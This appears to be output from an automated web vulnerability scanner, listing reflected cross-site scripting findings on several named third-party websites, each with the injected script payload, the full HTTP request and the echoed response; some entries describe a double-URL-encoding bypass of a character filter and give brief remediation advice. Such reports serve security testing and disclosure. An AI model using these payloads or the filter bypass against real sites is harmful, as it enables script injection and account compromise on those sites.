bbyon.ajaxReturnTaxonometricSuccess({ "responseHeader":{ "status":0, "QTime":0, "params":{ "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess", "fl":"title,type,ss_type,ss_feature_desc,sis_field ...[SNIP]... mage,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created", "sort":"sis_field_dotcom_slot asc,sis_field_yellow_tag_rating desc,created desc", "indent":"ona4c14<script>alert(1)</script>d4c6728b788", "start":"0", "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallery", "callback":"jsonp1313106315813", "qt":"standard", "wt":"json", "rows":"3"}}, "response":{"numFound":7, ...[SNIP]...
The value of the json.wrf request parameter is copied into the HTML document as plain text between tags. The payload 7be8e<script>alert(1)</script>cadeab2043d was submitted in the json.wrf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess7be8e<script>alert(1)</script>cadeab2043d HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/
Response
HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:25:00 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 2631
Date: Thu, 11 Aug 2011 23:44:33 GMT
Connection: close
1.214. http://content.bestbuyon.com/solr/select/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://content.bestbuyon.com
Path: /solr/select/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7190a<script>alert(1)</script>c544176858a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess&7190a<script>alert(1)</script>c544176858a=1 HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/
Response
HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:20:38 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 2599
Date: Thu, 11 Aug 2011 23:44:33 GMT
Connection: close
bbyon.ajaxReturnTaxonometricSuccess({ "responseHeader":{ "status":0, "QTime":0, "params":{ "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess", "fl":"title,type,ss_type,ss_feature_desc,sis_field ...[SNIP]... ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created", "sort":"sis_field_dotcom_slot asc,sis_field_yellow_tag_rating desc,created desc", "indent":"on", "7190a<script>alert(1)</script>c544176858a":"1", "start":"0", "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallery", "callback":"jsonp1313106315813", "qt":"standard", "wt":"json", "rows":"3"}}, "response":{"numFound ...[SNIP]...
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload a1818<script>alert(1)</script>aed90a4ab72 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallerya1818<script>alert(1)</script>aed90a4ab72&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/
Response
HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:11:00 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 756
Date: Thu, 11 Aug 2011 23:44:31 GMT
Connection: close
bbyon.ajaxReturnTaxonometricSuccess({ "responseHeader":{ "status":0, "QTime":1, "params":{ "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess", "fl":"title,type,ss_type,ss_feature_desc,sis_field ...[SNIP]... ail,created", "sort":"sis_field_dotcom_slot asc,sis_field_yellow_tag_rating desc,created desc", "indent":"on", "start":"0", "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallerya1818<script>alert(1)</script>aed90a4ab72", "callback":"jsonp1313106315813", "qt":"standard", "wt":"json", "rows":"3"}}, "response":{"numFound":0,"start":0,"docs":[] }})
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15082%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6008e264d60 was submitted in the REST URL parameter 5. This input was echoed as 15082"><script>alert(1)</script>6008e264d60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2e2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1cc3c2ed414 was submitted in the REST URL parameter 5. This input was echoed as f2e2f"><script>alert(1)</script>1cc3c2ed414 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of the Action request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3c09'%3balert(1)//4faa26409b6 was submitted in the Action parameter. This input was echoed as f3c09';alert(1)//4faa26409b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Action request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44839'%3balert(1)//c075691c24c was submitted in the Action parameter. This input was echoed as 44839';alert(1)//c075691c24c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /store?Action=DisplayContentManagerStyleSheet44839'%3balert(1)//c075691c24c&SiteID=adbevlus&StyleID=35830700&StyleVersion=17&styleIncludeFile=style.css HTTP/1.1
Host: drh.img.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://volumelicensing.adobe.com/store/adbevlus/en_US/pd/ProductID.230278700?af0f8--%3E%3Cscript%3Ealert(document.location)%3C/script%3Ebb99325cab5=1
Response
HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Last-Modified: Wed, 31 Aug 2011 13:16:04 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=86400+0;age=0;ecid=23501754707,0)
Content-Length: 39650
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app77
Cache-Control: max-age=86400
Expires: Thu, 01 Sep 2011 13:16:04 GMT
Date: Wed, 31 Aug 2011 13:16:04 GMT
Connection: close
Vary: Accept-Encoding
The value of the pt1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad198'-alert(1)-'f60f448d4b0 was submitted in the pt1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pt2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52654'-alert(1)-'99b1aa3f16d was submitted in the pt2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pt3 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b254c'-alert(1)-'3820416d3a8 was submitted in the pt3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload aa7d0<script>alert(1)</script>09589a620ba was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Zvents_load_ZventsWidget1aa7d0<script>alert(1)</script>09589a620ba('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Stomp","id":175823405,"startTime":"Thu Aug 11 20:00:00 UTC 2011","endTime":null,"zurl":"/new-york-ny/events/show/175823405-stomp"},{"name" ...[SNIP]...
The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 67f36<script>alert(1)</script>5a44214f354 was submitted in the st parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Zvents_load_ZventsWidget1('callback({"rsp":{"status":"error","msg":"Invalid search: event67f365a44214f354 is not a valid search category.","content":{"next_page":false,"identifier": "st=event67f36<script>alert(1)</script>5a44214f354&when=today&ssi=0&srss=4"}}})')
The value of the image_size request parameter is copied into the HTML document as plain text between tags. The payload a2960<script>alert(1)</script>23d031d555e was submitted in the image_size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:35:35 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 455
ETag: "2db2f2300aa255ecfb1ee8c22ab5041a"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: b145210b425eb01eee94d1c7b06bfb5dc9c830e7
Z-REQUEST-HANDLED-BY: www28
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 2131
jsp_0('callback({"rsp":{"status":"ok","content":{"events":[{"name":"The Freedom Party NYC","has_tickets":false,"tickets_on_sale":null,"venue_id":861747,"id":199524386,"images":[{"url":"http://www.zvents.com/images/internal/5/4/7/5/img_11635745_thumba2960<script>alert(1)</script>23d031d555e.jpg?resample_method=scaled","height":null,"width":null}],"starttime":"Fri Aug 12 23:00:00 UTC 2011","zurl":"/new-york-ny/events/show/199524386-the-freedom-party-nyc"},{"name":"Pacha Teen Night with Dj ...[SNIP]...
The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload 8b9c9<script>alert(1)</script>deca5adb594 was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:36:11 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 92
ETag: "ef147786317863042bcdeb82556459d0"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: be1188d01917925547700abedbea482ea7c8b840
Z-REQUEST-HANDLED-BY: www12
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 1958
jsp_08b9c9<script>alert(1)</script>deca5adb594('callback({"rsp":{"status":"ok","content":{"events":[{"name":"2011 Lincoln Center Out Of Doors: 28th Annual Roots of American Music Festival","has_tickets":false,"tickets_on_sale":null,"venue_id":2181 ...[SNIP]...
The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 6019a<script>alert(1)</script>64a6f8607b8 was submitted in the st parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the when request parameter is copied into the HTML document as plain text between tags. The payload d5cfb<script>alert(1)</script>2dd8a5df4aa was submitted in the when parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:35:53 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 19
ETag: "e3834b5cda8e7aef83a32aa6f27b09ac"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: 19ae35a7fb298d27c4555c7da507d4f846376446
Z-REQUEST-HANDLED-BY: www30
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 476
{"rsp":{"status":"failed","msg":"Unrecognized date format: next 30 daysd5cfb<script>alert(1)</script>2dd8a5df4aa is not recognized as a valid time. Here are some examples of times that we recognize:<ul style='padding-left:15px;'> ...[SNIP]...
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 10742<script>alert(1)</script>b543d8110c0 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/exacttarget/mbox/standard?mboxHost=www.exacttarget.com&mboxSession=1314893721327-888860&mboxPage=1314893721327-888860&screenHeight=1200&screenWidth=1920&browserWidth=1033&browserHeight=852&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=et_beta10742<script>alert(1)</script>b543d8110c0&mboxId=0&mboxTime=1314875721479&mboxURL=http%3A%2F%2Fwww.exacttarget.com%2F&mboxReferrer=http%3A%2F%2Fwww.iab.net%2Fsite_map&mboxVersion=40 HTTP/1.1
Host: exacttarget.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.exacttarget.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 203
Date: Thu, 01 Sep 2011 16:15:53 GMT
Server: Test & Target
The value of the count request parameter is copied into the HTML document as plain text between tags. The payload 63266<script>alert(1)</script>229a106f66a was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v2/js/awsbuzz?title=AWS%20Buzz%20on%20Delicious&icon=rss&count=1063266<script>alert(1)</script>229a106f66a&sort=date HTTP/1.1
Host: feeds.delicious.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://aws.typepad.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sun, 02 Oct 2011 01:31:38 GMT
Server: nginx/1.0.6
Content-Length: 751
Connection: keep-alive
The value of the icon request parameter is copied into the HTML document as plain text between tags. The payload 4bba2<script>alert(1)</script>aeadd697d46 was submitted in the icon parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v2/js/awsbuzz?title=AWS%20Buzz%20on%20Delicious&icon=rss4bba2<script>alert(1)</script>aeadd697d46&count=10&sort=date HTTP/1.1
Host: feeds.delicious.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://aws.typepad.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sun, 02 Oct 2011 01:31:36 GMT
Server: nginx/1.0.5
Content-Length: 710
Connection: keep-alive
1.232. http://feeds.delicious.com/v2/js/awsbuzz [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://feeds.delicious.com
Path: /v2/js/awsbuzz
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1d17a<script>alert(1)</script>2d39d680b48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v2/js/awsbuzz?title=AWS%20Buzz%20on%20Delicious&icon=rss&count=10&sort=date&1d17a<script>alert(1)</script>2d39d680b48=1 HTTP/1.1
Host: feeds.delicious.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://aws.typepad.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sun, 02 Oct 2011 01:31:43 GMT
Server: nginx/1.0.5
Content-Length: 719
Connection: keep-alive
The value of the sort request parameter is copied into the HTML document as plain text between tags. The payload 7b7b2<script>alert(1)</script>b72a370e221 was submitted in the sort parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v2/js/awsbuzz?title=AWS%20Buzz%20on%20Delicious&icon=rss&count=10&sort=date7b7b2<script>alert(1)</script>b72a370e221 HTTP/1.1
Host: feeds.delicious.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://aws.typepad.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sun, 02 Oct 2011 01:31:41 GMT
Server: nginx/1.0.6
Content-Length: 710
Connection: keep-alive
The value of the title request parameter is copied into the HTML document as plain text between tags. The payload 1299a<script>alert(1)</script>640aa9f4867 was submitted in the title parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v2/js/awsbuzz?title=AWS%20Buzz%20on%20Delicious1299a<script>alert(1)</script>640aa9f4867&icon=rss&count=10&sort=date HTTP/1.1
Host: feeds.delicious.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://aws.typepad.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sun, 02 Oct 2011 01:31:34 GMT
Server: nginx/1.0.5
Content-Length: 710
Connection: keep-alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e72ac"-alert(1)-"9131707641a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dce72ac"-alert(1)-"9131707641a/10449/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=46E994820BEA60E036BF5BE397EDBBC0; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:34 GMT
Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10fb9"-alert(1)-"6e53e38484e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/1044910fb9"-alert(1)-"6e53e38484e/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5469F15AA88EEE3255E56F24ACA66C81; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:34 GMT
Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44c9e"-alert(1)-"e76675c569d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10449/14581744c9e"-alert(1)-"e76675c569d/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:35 GMT
Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac792"-alert(1)-"f774c7feed6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10449/145817/adiac792"-alert(1)-"f774c7feed6/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
